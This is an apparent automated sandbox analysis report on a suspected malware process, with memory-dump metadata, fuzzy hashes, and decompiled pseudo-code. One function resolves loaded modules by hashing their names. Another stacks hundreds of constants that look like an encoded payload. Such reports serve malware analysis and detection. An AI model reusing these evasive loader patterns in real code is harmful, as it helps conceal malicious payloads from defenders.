0x002a5761
0x002a576f
0x002a577a
0x002a577b
0x002a577e
0x002a5780
0x00000000
0x00000000
0x002a5782
0x002a5782
0x002a5785
0x002a5787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5787
0x00000000
0x002a5761
0x002a5743
0x002a5743
0x002a5743
0x002a5746
0x002a5748
0x002a5789
0x002a5789
0x002a578c
0x002a578c
0x002a578f
0x002a6211
0x002a6211
0x00000000
0x00000000
0x00000000
0x00000000
0x002a574a
0x002a574a
0x002a574a
0x002a574c
0x002a57d0
0x002a57d0
0x00000000
0x002a5752
0x002a5752
0x00000000
0x002a5752
0x002a574c
0x002a5748
0x00000000
0x002a5795
0x002a5798
0x002a579a
0x002a579c
0x002a579d
0x002a579f
0x002a57a2
0x002a57a5
0x002a57a8
0x002a57a8
0x00000000
0x002a57ad
0x002a572a
0x00000000
0x002a5721
0x002a55e8
0x002a63a4
0x002a63a4
0x002a63a4
0x002a63a7
0x002a644a
0x002a644a
0x00000000
0x002a644a
0x002a5470
0x002a5470
0x002a5472
0x002a5497
0x002a549c
0x002a54a1
0x002a54a3
0x002a54a5
0x002a54a8
0x002a54ab
0x00000000
0x002a5474
0x00000000
0x002a5474
0x002a5482
0x002a5484
0x002a5485
0x002a5488
0x002a548a
0x002a548d
0x002a5490
0x002a5495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5495
0x002a633c
0x002a6422
0x002a6422
0x002a642b
0x002a6430
0x002a6430
0x002a6433
0x002a6436
0x002a6439
0x002a643b
0x002a643b
0x002a643e
0x002a6440
0x002a644d
0x002a644d
0x002a6450
0x002a6452
0x002a6454
0x002a6454
0x002a6454
0x002a6457
0x00000000
0x00000000
0x002a6459
0x002a6459
0x002a645a
0x002a645d
0x002a645f
0x00000000
0x00000000
0x00000000
0x002a645f
0x002a6454
0x002a6452
0x002a643e
0x002a6439
0x002a5472
0x00000000
0x002a5426
0x002a5426
0x002a542b
0x002a542c
0x002a542d
0x002a5430
0x002a5430
0x002a5434
0x002a5436
0x002a543c
0x002a5444
0x002a5444
0x002a5448
0x002a544b
0x002a544e
0x00000000
0x002a544e
0x002a5404
0x002a6461
0x002a6461
0x002a6464
0x002a6466
0x002a646b
0x002a646e
0x002a6471
0x002a6474
0x002a6476
0x002a6479
0x002a6483
0x002a648e
0x002a6491
0x002a6495
0x002a649b
0x002a64a1
0x002a64a7
0x002a64aa
0x002a64ad
0x002a64b2
0x002a64b5
0x002a64b7
0x002a64bd
0x002a64bd
0x002a64bf
0x002a64c5
0x002a64c5
0x002a64cf
0x002a64d5
0x002a64de
0x002a64e1
0x002a64e4
0x002a64e6
0x002a64ea
0x002a64ed
0x002a64f3
0x002a64f3
0x002a64f5
0x002a64f5
0x002a64f5
0x002a64f7
0x002a64fa
0x002a64fd
0x002a6503
0x002a6503
0x002a6508
0x002a6509
0x002a650a
0x002a650b
0x002a650b
0x002a650b
0x002a6510
0x002a6510
0x002a6513
0x002a6516
0x002a6521
0x002a652c
0x002a6537
0x002a6542
0x002a654d
0x002a6558
0x002a6563
0x002a6568
0x002a656b
0x002a656d
0x002a6572
0x002a6574
0x002a6574
0x002a6579
0x002a657c
0x002a657c
0x002a657f
0x002a657f
0x002a6581
0x002a6584
0x002a6586
0x002a6588
0x002a658c
0x002a658f
0x002a6591
0x002a6591
0x002a6596
0x002a659e
0x002a65a2
0x002a65a2
0x002a65a6
0x002a65b0
0x002a65b0
0x002a65b3
0x002a65b5
0x002a65b9
0x002a65bb
0x002a65be
0x002a65c0
0x002a65c2
0x002a65c2
0x002a65c2
0x002a65c5
0x002a65c8
0x002a65cb
0x002a65ce
0x002a65d1
0x002a65d1
0x002a65d4
0x002a65d4
0x002a65d6
0x002a65d8
0x002a65de
0x002a65e0
0x002a65e2
0x002a65e2
0x002a65e3
0x002a65e3
0x002a65e6
0x002a65e9
0x002a65eb
0x002a65eb
0x002a65eb
0x002a65ed
0x002a65f2
0x002a65fd
0x002a6609
0x002a660f
0x002a6611
0x002a6611
0x002a6611
0x002a6614
0x002a6619
0x002a661c
0x002a661c
0x002a6625
0x002a662a
0x002a662a
0x002a662b
0x002a662e
0x002a6630
0x002a6633
0x002a6635
0x002a6637
0x002a663b
0x002a663d
0x002a6645
0x002a6645
0x002a6645
0x002a663b
0x002a6635
0x002a64bf
0x002a6648
0x002a6650
0x00000000
0x002a6650
0x002a6347
0x002a6347
0x00000000

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5259660b5e15562c1c444882c8a273ef84b69e9ccbda48530dc7bdfb35814425
Instruction ID: 72ef362f7476aa1efd6e63325ff3b7784f2af8f3bdfce37d5406ca254f593e3d
Opcode Fuzzy Hash: 5259660b5e15562c1c444882c8a273ef84b69e9ccbda48530dc7bdfb35814425
Instruction Fuzzy Hash: 9312B371E2062ADFCF18CF69C8902BEBBB1FF4A300F24456AD856A7740DB749951DB90

Uniqueness

Uniqueness Score: 0.00%

Function 002A1550, Relevance: .0, Instructions: 38
COMMON

C-Code - Quality: 72%

			E002A1550(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _t6;
				signed int _t7;
				intOrPtr* _t10;
				signed int _t13;
				intOrPtr* _t16;
				signed short* _t18;

				_push(__ecx);
				_t6 =  *[fs:0x30];
				_t10 =  *((intOrPtr*)(_t6 + 0xc)) + 0xc;
				_v8 = __ecx;
				_t16 =  *_t10;
				if(_t16 == _t10) {
					L9:
					goto 0x5a021e;
					asm("int3");
					asm("int3");
					asm("int3");
					return _t6;
				} else {
					do {
						_t18 =  *(_t16 + 0x30);
						_t13 = 0;
						_t6 =  *_t18 & 0x0000ffff;
						while(_t6 != 0) {
							_t4 = _t6 - 0x41; // -17
							_t7 = _t6 & 0x0000ffff;
							if(_t4 <= 0x19) {
								_t7 = _t7 + 0x20;
							}
							_t18 =  &(_t18[1]);
							_t13 = _t13 * 0x1003f + _t7;
							_t6 =  *_t18 & 0x0000ffff;
						}
						if(_t13 == _v8) {
							goto 0x5a0234;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							return _t6;
						} else {
							goto L8;
						}
						goto L11;
						L8:
						_t16 =  *_t16;
					} while (_t16 != _t10);
					goto L9;
				}
				L11:
			}

0x002a1553
0x002a1554
0x002a1560
0x002a1563
0x002a1566
0x002a156a
0x002a15ad
0x002a15ad
0x002a15b2
0x002a15b3
0x002a15b4
0x002a15b5
0x002a1570
0x002a1570
0x002a1570
0x002a1573
0x002a1575
0x002a157b
0x002a1580
0x002a1583
0x002a158a
0x002a158c
0x002a158c
0x002a1595
0x002a1598
0x002a159a
0x002a159d
0x002a15a5
0x002a15b6
0x002a15bb
0x002a15bc
0x002a15bd
0x002a15be
0x002a15bf
0x00000000
0x00000000
0x00000000
0x00000000
0x002a15a7
0x002a15a7
0x002a15a9
0x00000000
0x002a1570
0x00000000

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d805caa6a727b58e6fdcb5974b30174d33f5296e00d38a82bfd6f7a3f0adab80
Instruction ID: 2045c21a14f68495a427b48287f70c243eeb79a2bd3d25ef65ce838d8c734d74
Opcode Fuzzy Hash: d805caa6a727b58e6fdcb5974b30174d33f5296e00d38a82bfd6f7a3f0adab80
Instruction Fuzzy Hash: 21F0F476D201069BCB30DF05C984679B3E6FFD5364BD94059E8465B240EF34AD61D750

Uniqueness

Uniqueness Score: 0.00%

Function 002A717A, Relevance: 40.7, APIs: 3, Strings: 20, Instructions: 467
memorylibraryUNIQUE

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E002A717A(void* __esi, void* __eflags) {
				int _t452;
				void* _t454;
				void* _t459;
				void* _t461;
				void* _t462;
				void* _t463;

				 *((intOrPtr*)(_t463 - 0x6fc)) = 0xda13a380;
				 *((intOrPtr*)(_t463 - 0x6f8)) = 0x4a2d724d;
				 *((intOrPtr*)(_t463 - 0x6f4)) = 0xbbbef731;
				 *((intOrPtr*)(_t463 - 0x6f0)) = 0x335bc7e2;
				 *((intOrPtr*)(_t463 - 0x6ec)) = 0xfe1b3ebb;
				 *((intOrPtr*)(_t463 - 0x6e8)) = 0x1517088;
				 *((intOrPtr*)(_t463 - 0x6e4)) = 0xc306eafb;
				 *((intOrPtr*)(_t463 - 0x6e0)) = 0xe7eb6c1f;
				 *((intOrPtr*)(_t463 - 0x6dc)) = 0x38670867;
				 *((intOrPtr*)(_t463 - 0x6d8)) = 0xcd989c2d;
				 *((intOrPtr*)(_t463 - 0x6d4)) = 0x22f5ead6;
				 *((intOrPtr*)(_t463 - 0x6d0)) = 0xf84e10bf;
				 *((intOrPtr*)(_t463 - 0x6cc)) = 0xdc8796e2;
				 *((intOrPtr*)(_t463 - 0x6c8)) = 0x369fd1c8;
				 *((intOrPtr*)(_t463 - 0x6c4)) = 0x2b6014cc;
				 *((intOrPtr*)(_t463 - 0x6c0)) = 0x37772353;
				 *((intOrPtr*)(_t463 - 0x6bc)) = 0x1fdd8645;
				 *((intOrPtr*)(_t463 - 0x6b8)) = 0x9296362b;
				 *((intOrPtr*)(_t463 - 0x6b4)) = 0x1e1487d7;
				 *((intOrPtr*)(_t463 - 0x6b0)) = 0xcc9a4641;
				 *((intOrPtr*)(_t463 - 0x6ac)) = 0xe415f087;
				 *((intOrPtr*)(_t463 - 0x6a8)) = 0x62ae3378;
				 *((intOrPtr*)(_t463 - 0x6a4)) = 0x10a872c0;
				 *((intOrPtr*)(_t463 - 0x6a0)) = 0x2f5a0b3e;
				 *((intOrPtr*)(_t463 - 0x69c)) = 0xec070bd9;
				 *((intOrPtr*)(_t463 - 0x698)) = 0x554b37ff;
				 *((intOrPtr*)(_t463 - 0x694)) = 0x3214b6e6;
				 *((intOrPtr*)(_t463 - 0x690)) = 0x1c6154ae;
				 *((intOrPtr*)(_t463 - 0x68c)) = 0x859bc5de;
				 *((intOrPtr*)(_t463 - 0x688)) = 0x7ee4a1a6;
				 *((intOrPtr*)(_t463 - 0x684)) = 0x28946554;
				 *((intOrPtr*)(_t463 - 0x680)) = 0x4d3d51f;
				 *((intOrPtr*)(_t463 - 0x67c)) = 0x8ccb73df;
				 *((intOrPtr*)(_t463 - 0x678)) = 0x3dbead2;
				 *((intOrPtr*)(_t463 - 0x674)) = 0x299093ec;
				 *((intOrPtr*)(_t463 - 0x670)) = 0x912d9436;
				 *((intOrPtr*)(_t463 - 0x66c)) = 0xbe49d910;
				 *((intOrPtr*)(_t463 - 0x668)) = 0x27a738a5;
				 *((intOrPtr*)(_t463 - 0x664)) = 0x8907b220;
				 *((intOrPtr*)(_t463 - 0x660)) = 0xc8ed5966;
				 *((intOrPtr*)(_t463 - 0x65c)) = 0xdc3fcee6;
				 *((intOrPtr*)(_t463 - 0x658)) = 0x9e10caf6;
				 *((intOrPtr*)(_t463 - 0x654)) = 0x4453d80;
				 *((intOrPtr*)(_t463 - 0x650)) = 0x226e4280;
				 *((intOrPtr*)(_t463 - 0x64c)) = 0xc6aced26;
				 *((intOrPtr*)(_t463 - 0x648)) = 0xa539b9b;
				 *((intOrPtr*)(_t463 - 0x644)) = 0xd276a9b5;
				 *((intOrPtr*)(_t463 - 0x640)) = 0x34d76a8d;
				 *((intOrPtr*)(_t463 - 0x63c)) = 0xf3f37ec1;
				 *((intOrPtr*)(_t463 - 0x638)) = 0xc3074508;
				 *((intOrPtr*)(_t463 - 0x634)) = 0x8e2cbf38;
				 *((intOrPtr*)(_t463 - 0x630)) = 0x5335e85f;
				 *((intOrPtr*)(_t463 - 0x62c)) = 0x1636db53;
				 *((intOrPtr*)(_t463 - 0x628)) = 0xf5fca815;
				 *((intOrPtr*)(_t463 - 0x624)) = 0xb4447e5c;
				 *((intOrPtr*)(_t463 - 0x620)) = 0xc360be71;
				 *((intOrPtr*)(_t463 - 0x61c)) = 0x5b604abd;
				 *((intOrPtr*)(_t463 - 0x618)) = 0x9d64890;
				 *((intOrPtr*)(_t463 - 0x614)) = 0xa490b32e;
				 *((intOrPtr*)(_t463 - 0x610)) = 0xabed6f87;
				 *((intOrPtr*)(_t463 - 0x60c)) = 0x67fc4fe0;
				 *((intOrPtr*)(_t463 - 0x608)) = 0xe983bc6a;
				 *((intOrPtr*)(_t463 - 0x604)) = 0x7b8ea4e6;
				 *((intOrPtr*)(_t463 - 0x600)) = 0x553e608a;
				 *((intOrPtr*)(_t463 - 0x5fc)) = 0x40451882;
				 *((intOrPtr*)(_t463 - 0x5f8)) = 0x870018c2;
				 *((intOrPtr*)(_t463 - 0x5f4)) = 0x5dd1138d;
				 *((intOrPtr*)(_t463 - 0x5f0)) = 0x854db42f;
				 *((intOrPtr*)(_t463 - 0x5ec)) = 0xdca42c0c;
				 *((intOrPtr*)(_t463 - 0x5e8)) = 0xd96f55d7;
				 *((intOrPtr*)(_t463 - 0x5e4)) = 0xf57dccd;
				 *((intOrPtr*)(_t463 - 0x5e0)) = 0x70dfccd0;
				 *((intOrPtr*)(_t463 - 0x5dc)) = 0xfb1196b8;
				 *((intOrPtr*)(_t463 - 0x5d8)) = 0x4e6cd616;
				 *((intOrPtr*)(_t463 - 0x5d4)) = 0xe5ce3506;
				 *((intOrPtr*)(_t463 - 0x5d0)) = 0x62ce63b;
				 *((intOrPtr*)(_t463 - 0x5cc)) = 0x9c78bdb5;
				 *((intOrPtr*)(_t463 - 0x5c8)) = 0x56222b50;
				 *((intOrPtr*)(_t463 - 0x5c4)) = 0x8f638c3a;
				 *((intOrPtr*)(_t463 - 0x5c0)) = 0x7f6fd8ad;
				 *((intOrPtr*)(_t463 - 0x5bc)) = 0x8307f23b;
				 *((intOrPtr*)(_t463 - 0x5b8)) = 0x330ec9fb;
				 *((intOrPtr*)(_t463 - 0x5b4)) = 0x128d0a18;
				 *((intOrPtr*)(_t463 - 0x5b0)) = 0xf2853133;
				 *((intOrPtr*)(_t463 - 0x5ac)) = 0xb28e8662;
				 *((intOrPtr*)(_t463 - 0x5a8)) = 0xcc6041b;
				 *((intOrPtr*)(_t463 - 0x5a4)) = 0x503860ba;
				 *((intOrPtr*)(_t463 - 0x5a0)) = 0xaf848ab6;
				 *((intOrPtr*)(_t463 - 0x59c)) = 0xc7f7d317;
				 *((intOrPtr*)(_t463 - 0x598)) = 0x13073c8b;
				 *((intOrPtr*)(_t463 - 0x594)) = 0x9052bc99;
				 *((intOrPtr*)(_t463 - 0x590)) = 0x877c99df;
				 *((intOrPtr*)(_t463 - 0x58c)) = 0x6c99bb22;
				 *((intOrPtr*)(_t463 - 0x588)) = 0x58ef0440;
				 *((intOrPtr*)(_t463 - 0x584)) = 0x34bf58b3;
				 *((intOrPtr*)(_t463 - 0x580)) = 0x5993081f;
				 *((intOrPtr*)(_t463 - 0x57c)) = 0x515bdc21;
				 *((intOrPtr*)(_t463 - 0x578)) = 0x787835c3;
				 *((intOrPtr*)(_t463 - 0x574)) = 0x87ae10eb;
				 *((intOrPtr*)(_t463 - 0x570)) = 0x32d4b469;
				 *((intOrPtr*)(_t463 - 0x56c)) = 0x661ffa4d;
				 *((intOrPtr*)(_t463 - 0x568)) = 0x98cd5178;
				 *((intOrPtr*)(_t463 - 0x564)) = 0xe5a99966;
				 *((intOrPtr*)(_t463 - 0x560)) = 0x30cc96f5;
				 *((intOrPtr*)(_t463 - 0x55c)) = 0x4bda7984;
				 *((intOrPtr*)(_t463 - 0x558)) = 0x7c3f202c;
				 *((intOrPtr*)(_t463 - 0x554)) = 0xc9dc119f;
				 *((intOrPtr*)(_t463 - 0x550)) = 0x303f7fb7;
				 *((intOrPtr*)(_t463 - 0x54c)) = 0x2f3e966e;
				 *((intOrPtr*)(_t463 - 0x548)) = 0xbe38574d;
				 *((intOrPtr*)(_t463 - 0x544)) = 0xfdd53dc6;
				 *((intOrPtr*)(_t463 - 0x540)) = 0x6159b14a;
				 *((intOrPtr*)(_t463 - 0x53c)) = 0xab550c22;
				 *((intOrPtr*)(_t463 - 0x538)) = 0x7546765d;
				 *((intOrPtr*)(_t463 - 0x534)) = 0x9db4a3a8;
				 *((intOrPtr*)(_t463 - 0x530)) = 0x8febdd9d;
				 *((intOrPtr*)(_t463 - 0x52c)) = 0x942a1da5;
				 *((intOrPtr*)(_t463 - 0x528)) = 0x8ce7803f;
				 *((intOrPtr*)(_t463 - 0x524)) = 0x8f979a1a;
				 *((intOrPtr*)(_t463 - 0x520)) = 0x4973ed66;
				 *((intOrPtr*)(_t463 - 0x51c)) = 0xf026f445;
				 *((intOrPtr*)(_t463 - 0x518)) = 0x879c0fd7;
				 *((intOrPtr*)(_t463 - 0x514)) = 0x6b636af;
				 *((intOrPtr*)(_t463 - 0x510)) = 0xfc789df7;
				 *((intOrPtr*)(_t463 - 0x50c)) = 0xe9302e0f;
				 *((intOrPtr*)(_t463 - 0x508)) = 0x6bf7e741;
				 *((intOrPtr*)(_t463 - 0x504)) = 0x98954128;
				 *((intOrPtr*)(_t463 - 0x500)) = 0x7763bde3;
				 *((intOrPtr*)(_t463 - 0x4fc)) = 0xb1f3814;
				 *((intOrPtr*)(_t463 - 0x4f8)) = 0x9f3a0dd8;
				 *((intOrPtr*)(_t463 - 0x4f4)) = 0x8eb0c0cb;
				 *((intOrPtr*)(_t463 - 0x4f0)) = 0xe5f73fe6;
				 *((intOrPtr*)(_t463 - 0x4ec)) = 0xb1e43bd0;
				 *((intOrPtr*)(_t463 - 0x4e8)) = 0x771b000e;
				 *((intOrPtr*)(_t463 - 0x4e4)) = 0xcd3fef67;
				 *((intOrPtr*)(_t463 - 0x4e0)) = 0x92be2bdc;
				 *((intOrPtr*)(_t463 - 0x4dc)) = 0xa68fa81;
				 *((intOrPtr*)(_t463 - 0x4d8)) = 0x9dad74b3;
				 *((intOrPtr*)(_t463 - 0x4d4)) = 0xc44aa636;
				 *((intOrPtr*)(_t463 - 0x4d0)) = 0xe3c10673;
				 *((intOrPtr*)(_t463 - 0x4cc)) = 0x5937842a;
				 *((intOrPtr*)(_t463 - 0x4c8)) = 0x194c927d;
				 *((intOrPtr*)(_t463 - 0x4c4)) = 0x68ba32e5;
				 *((intOrPtr*)(_t463 - 0x4c0)) = 0x9d9ca700;
				 *((intOrPtr*)(_t463 - 0x4bc)) = 0xe42720fb;
				 *((intOrPtr*)(_t463 - 0x4b8)) = 0x97bf4093;
				 *((intOrPtr*)(_t463 - 0x4b4)) = 0xe480a8ff;
				 *((intOrPtr*)(_t463 - 0x4b0)) = 0xade1974;
				 *((intOrPtr*)(_t463 - 0x4ac)) = 0xe9af4224;
				 *((intOrPtr*)(_t463 - 0x4a8)) = 0x96d703c2;
				 *((intOrPtr*)(_t463 - 0x4a4)) = 0xe04a501d;
				 *((intOrPtr*)(_t463 - 0x4a0)) = 0x1e77706d;
				 *((intOrPtr*)(_t463 - 0x49c)) = 0xb7f78974;
				 *((intOrPtr*)(_t463 - 0x498)) = 0x76fc7a7a;
				 *((intOrPtr*)(_t463 - 0x494)) = 0xeab1e862;
				 *((intOrPtr*)(_t463 - 0x490)) = 0xc448d29a;
				 *((intOrPtr*)(_t463 - 0x48c)) = 0xcfdfd93a;
				 *((intOrPtr*)(_t463 - 0x488)) = 0xc00b719e;
				 *((intOrPtr*)(_t463 - 0x484)) = 0x5c421644;
				 *((intOrPtr*)(_t463 - 0x480)) = 0xef8a9d35;
				 *((intOrPtr*)(_t463 - 0x47c)) = 0xc2f9cdbf;
				 *((intOrPtr*)(_t463 - 0x478)) = 0xd75ab0e4;
				 *((intOrPtr*)(_t463 - 0x474)) = 0xd4fd446f;
				 *((intOrPtr*)(_t463 - 0x470)) = 0x6c0d7af9;
				 *((intOrPtr*)(_t463 - 0x46c)) = 0x2423c84f;
				 *((intOrPtr*)(_t463 - 0x468)) = 0xd6fd3e2b;
				 *((intOrPtr*)(_t463 - 0x464)) = 0x65814f77;
				 *((intOrPtr*)(_t463 - 0x460)) = 0x1075fea8;
				 *((intOrPtr*)(_t463 - 0x45c)) = 0xdc9dee07;
				 *((intOrPtr*)(_t463 - 0x458)) = 0x3bbee7e7;
				 *((intOrPtr*)(_t463 - 0x454)) = 0xf7a6cff8;
				 *((intOrPtr*)(_t463 - 0x450)) = 0xc5e08db9;
				 *((intOrPtr*)(_t463 - 0x44c)) = 0x8e09787f;
				 *((intOrPtr*)(_t463 - 0x448)) = 0x75053736;
				 *((intOrPtr*)(_t463 - 0x444)) = 0x3746f159;
				 *((intOrPtr*)(_t463 - 0x440)) = 0x81da0dce;
				 *((intOrPtr*)(_t463 - 0x43c)) = 0x8a31c1eb;
				 *((intOrPtr*)(_t463 - 0x438)) = 0x42ec62d3;
				 *((intOrPtr*)(_t463 - 0x434)) = 0x1ffe42cb;
				 *((intOrPtr*)(_t463 - 0x430)) = 0x7d8d2ccb;
				 *((intOrPtr*)(_t463 - 0x42c)) = 0xbe5a5ea0;
				 *((intOrPtr*)(_t463 - 0x428)) = 0x6a48c00;
				 *((intOrPtr*)(_t463 - 0x424)) = 0xb9ed38e0;
				 *((intOrPtr*)(_t463 - 0x420)) = 0xbd2dc679;
				 *((intOrPtr*)(_t463 - 0x41c)) = 0x39aa03f5;
				 *((intOrPtr*)(_t463 - 0x418)) = 0xd7ee1a12;
				 *((intOrPtr*)(_t463 - 0x414)) = 0xfbea6635;
				 *((intOrPtr*)(_t463 - 0x410)) = 0x89b73866;
				 *((intOrPtr*)(_t463 - 0x40c)) = 0xe12bc354;
				 *((intOrPtr*)(_t463 - 0x408)) = 0x81996796;
				 *((intOrPtr*)(_t463 - 0x404)) = 0x7a4d18fa;
				 *((intOrPtr*)(_t463 - 0x400)) = 0xa06479c8;
				 *((intOrPtr*)(_t463 - 0x3fc)) = 0xb2b87b6c;
				 *((intOrPtr*)(_t463 - 0x3f8)) = 0x960cae1e;
				 *((intOrPtr*)(_t463 - 0x3f4)) = 0x92721397;
				 *((intOrPtr*)(_t463 - 0x3f0)) = 0x855794d2;
				 *((intOrPtr*)(_t463 - 0x3ec)) = 0x6e2783f0;
				 *((intOrPtr*)(_t463 - 0x3e8)) = 0x2990bcc4;
				 *((intOrPtr*)(_t463 - 0x3e4)) = 0xa275d0b2;
				 *((intOrPtr*)(_t463 - 0x3e0)) = 0x38acfc38;
				 *((intOrPtr*)(_t463 - 0x3dc)) = 0x7e4b475a;
				 *((intOrPtr*)(_t463 - 0x3d8)) = 0xcc650a45;
				 *((intOrPtr*)(_t463 - 0x3d4)) = 0x46ee7d90;
				 *((intOrPtr*)(_t463 - 0x3d0)) = 0x52db6a12;
				 *((intOrPtr*)(_t463 - 0x3cc)) = 0xcb5cc8b3;
				 *((intOrPtr*)(_t463 - 0x3c8)) = 0x8d274237;
				 *((intOrPtr*)(_t463 - 0x3c4)) = 0x2db6abbb;
				 *((intOrPtr*)(_t463 - 0x3c0)) = 0x73173549;
				 *((intOrPtr*)(_t463 - 0x3bc)) = 0xa3bc4232;
				 *((intOrPtr*)(_t463 - 0x3b8)) = 0xd9cd433c;
				 *((intOrPtr*)(_t463 - 0x3b4)) = 0x3831378e;
				 *((intOrPtr*)(_t463 - 0x3b0)) = 0x15d26c3d;
				 *((intOrPtr*)(_t463 - 0x3ac)) = 0x44991ce8;
				 *((intOrPtr*)(_t463 - 0x3a8)) = 0x1a59124e;
				 *((intOrPtr*)(_t463 - 0x3a4)) = 0x263f8333;
				 *((intOrPtr*)(_t463 - 0x3a0)) = 0xccd93843;
				 *((intOrPtr*)(_t463 - 0x39c)) = 0x254056e4;
				 *((intOrPtr*)(_t463 - 0x398)) = 0x11a185;
				 *((intOrPtr*)(_t463 - 0x394)) = 0x423c572c;
				 *((intOrPtr*)(_t463 - 0x390)) = 0x4d0fadf5;
				 *((intOrPtr*)(_t463 - 0x38c)) = 0xb32a5f7d;
				 *((intOrPtr*)(_t463 - 0x388)) = 0xbdf26336;
				 *((intOrPtr*)(_t463 - 0x384)) = 0xdc9b118e;
				 *((intOrPtr*)(_t463 - 0x380)) = 0xabfa5a90;
				 *((intOrPtr*)(_t463 - 0x37c)) = 0x512d3105;
				 *((intOrPtr*)(_t463 - 0x378)) = 0x3a65580d;
				 *((intOrPtr*)(_t463 - 0x374)) = 0x964bedc9;
				 *((intOrPtr*)(_t463 - 0x370)) = 0x2856c777;
				 *((intOrPtr*)(_t463 - 0x36c)) = 0x8390ded5;
				 *((intOrPtr*)(_t463 - 0x368)) = 0xf9ed8b2;
				 *((intOrPtr*)(_t463 - 0x364)) = 0xd01694f2;
				 *((intOrPtr*)(_t463 - 0x360)) = 0x87c295b3;
				 *((intOrPtr*)(_t463 - 0x35c)) = 0x49c46db9;
				 *((intOrPtr*)(_t463 - 0x358)) = 0x1dd48e6e;
				 *((intOrPtr*)(_t463 - 0x354)) = 0x2e721092;
				 *((intOrPtr*)(_t463 - 0x350)) = 0xe52ecf7a;
				 *((intOrPtr*)(_t463 - 0x34c)) = 0x17cdda0e;
				 *((intOrPtr*)(_t463 - 0x348)) = 0x3c53b6fe;
				 *((intOrPtr*)(_t463 - 0x344)) = 0x8f48d565;
				 *((intOrPtr*)(_t463 - 0x340)) = 0x43993e39;
				 *((intOrPtr*)(_t463 - 0x33c)) = 0xed09bdf2;
				 *((intOrPtr*)(_t463 - 0x338)) = 0x5961145a;
				 *((intOrPtr*)(_t463 - 0x334)) = 0x8526533d;
				 *((intOrPtr*)(_t463 - 0x330)) = 0x5ef91ba8;
				 *((intOrPtr*)(_t463 - 0x32c)) = 0x37d2b4a0;
				 *((intOrPtr*)(_t463 - 0x328)) = 0x58989eca;
				 *((intOrPtr*)(_t463 - 0x324)) = 0x27e39b75;
				 *((intOrPtr*)(_t463 - 0x320)) = 0x4920552a;
				 *((intOrPtr*)(_t463 - 0x31c)) = 0xa51805b7;
				 *((intOrPtr*)(_t463 - 0x318)) = 0x5f77e1a5;
				 *((intOrPtr*)(_t463 - 0x314)) = 0x410ccda1;
				 *((intOrPtr*)(_t463 - 0x310)) = 0x379f9fab;
				 *((intOrPtr*)(_t463 - 0x30c)) = 0x710f10e1;
				 *((intOrPtr*)(_t463 - 0x308)) = 0xb6b377ac;
				 *((intOrPtr*)(_t463 - 0x304)) = 0xead8e01d;
				 *((intOrPtr*)(_t463 - 0x300)) = 0x6a300eb6;
				 *((intOrPtr*)(_t463 - 0x2fc)) = 0xac9f4aef;
				 *((intOrPtr*)(_t463 - 0x2f8)) = 0x94963b8;
				 *((intOrPtr*)(_t463 - 0x2f4)) = 0x2ef621cb;
				 *((intOrPtr*)(_t463 - 0x2f0)) = 0x2a7e912c;
				 *((intOrPtr*)(_t463 - 0x2ec)) = 0x8b888c91;
				 *((intOrPtr*)(_t463 - 0x2e8)) = 0x10c13f0e;
				 *((intOrPtr*)(_t463 - 0x2e4)) = 0x941a2f31;
				 *((intOrPtr*)(_t463 - 0x2e0)) = 0x36c6129f;
				 *((intOrPtr*)(_t463 - 0x2dc)) = 0xe4c725f;
				 *((intOrPtr*)(_t463 - 0x2d8)) = 0x93c307ef;
				 *((intOrPtr*)(_t463 - 0x2d4)) = 0xf47416f5;
				 *((intOrPtr*)(_t463 - 0x2d0)) = 0x220e9ff0;
				 *((intOrPtr*)(_t463 - 0x2cc)) = 0xd7051b24;
				 *((intOrPtr*)(_t463 - 0x2c8)) = 0x8f2fd263;
				 *((intOrPtr*)(_t463 - 0x2c4)) = 0x42bb64f7;
				 *((intOrPtr*)(_t463 - 0x2c0)) = 0xf2f5df1e;
				 *((intOrPtr*)(_t463 - 0x2bc)) = 0xe5fcf499;
				 *((intOrPtr*)(_t463 - 0x2b8)) = 0x86e73;
				 *((intOrPtr*)(_t463 - 0x2b4)) = 0x917adac0;
				 *((intOrPtr*)(_t463 - 0x2b0)) = 0x82542f5;
				 *((intOrPtr*)(_t463 - 0x2ac)) = 0x7169b7c0;
				 *((intOrPtr*)(_t463 - 0x2a8)) = 0x55e8de5d;
				 *((intOrPtr*)(_t463 - 0x2a4)) = 0xc98de486;
				 *((intOrPtr*)(_t463 - 0x2a0)) = 0xa5f9dee8;
				 *((intOrPtr*)(_t463 - 0x29c)) = 0xae4f25d;
				 *((intOrPtr*)(_t463 - 0x298)) = 0x89c4da91;
				 *((intOrPtr*)(_t463 - 0x294)) = 0xd9280baf;
				 *((intOrPtr*)(_t463 - 0x290)) = 0x7efcb77b;
				 *((intOrPtr*)(_t463 - 0x28c)) = 0x8c5129e7;
				 *((intOrPtr*)(_t463 - 0x288)) = 0xee2a51d4;
				 *((intOrPtr*)(_t463 - 0x284)) = 0xae4a5ea0;
				 *((intOrPtr*)(_t463 - 0x280)) = 0xc3b14c11;
				 *((intOrPtr*)(_t463 - 0x27c)) = 0x8839fd47;
				 *((intOrPtr*)(_t463 - 0x278)) = 0xbee9fc8a;
				 *((intOrPtr*)(_t463 - 0x274)) = 0xcc2c1586;
				 *((intOrPtr*)(_t463 - 0x270)) = 0xd020ad33;
				 *((intOrPtr*)(_t463 - 0x26c)) = 0x9010167f;
